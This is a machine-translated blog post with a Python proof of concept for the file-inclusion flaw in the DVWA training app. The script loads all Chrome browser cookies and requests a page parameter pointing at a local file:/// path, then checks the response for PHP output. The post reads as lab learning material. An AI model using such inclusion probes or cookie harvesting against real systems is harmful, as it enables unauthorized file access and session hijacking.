当前位置:网站首页>POC——DVWA‘s File Inclusion
POC——DVWA‘s File Inclusion
2022-07-19 04:59:00 【wavesky111】
Verification of file containing vulnerability POC Relatively simple , Only get Just visit . But there is a premise —— The file to be used has been transferred to the other server , And specify the location of the files used ~
import requests
import browser_cookie3
cookie = browser_cookie3.chrome()
url = r"http://192.168.117.130/DVWA-1.9/vulnerabilities/fi/?page=file:///C:\Users\wavesky\Desktop/1.txt"
response = requests.get(url=url,cookies=cookie)
re = 'PHP Version'
flag=re in str(response.content)
if flag:
print("It looks likely vulnerable")
else:
print("It is strong")Three Level All possible , Go straight to the next one ~
边栏推荐
猜你喜欢

String string special interception processing according to symbols

CVE-2019-14234 Django JSONField SQL注入漏洞

TiDB 性能分析和优化

UE plug-in electronicnodes 5.0.0/4.23-4.27

CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞

3.RestClient查询文档

Hightec new aurix tc37x demo project

Cve-2021-44228 log4j reproduction and principle

MYSQL数据库表A数据同步到表B

Tasking new aurix tc37x demo project
随机推荐
加密和解密
Money making master applet [latest version 5.9.9] mall / instant withdrawal of commission / distribution promotion / phone recharge / is meituan hungry for takeout
关于当前响应已经调用了方法getOutputStream()
无限极分类
Masm32 writer
itext修改pdf文字
Codeforces Round #419 (Div. 1)B - Karen and Test
DSL查询文档
POC——DVWA‘s File Upload
一文了解配置中心
高等数学笔记:复合函数的二阶导数与参数方程求解曲率
Construction and application of knowledge map de (VII): large scale knowledge map pre training
es的一些概念
Redis installation
Kubernetes 的监控与告警
shardingsphere内核原理
Database learning notes (I) retrieval data
God rewards hard work, keep loving
solve [email protected] : `node install. Problems of js`
Base64与文件互转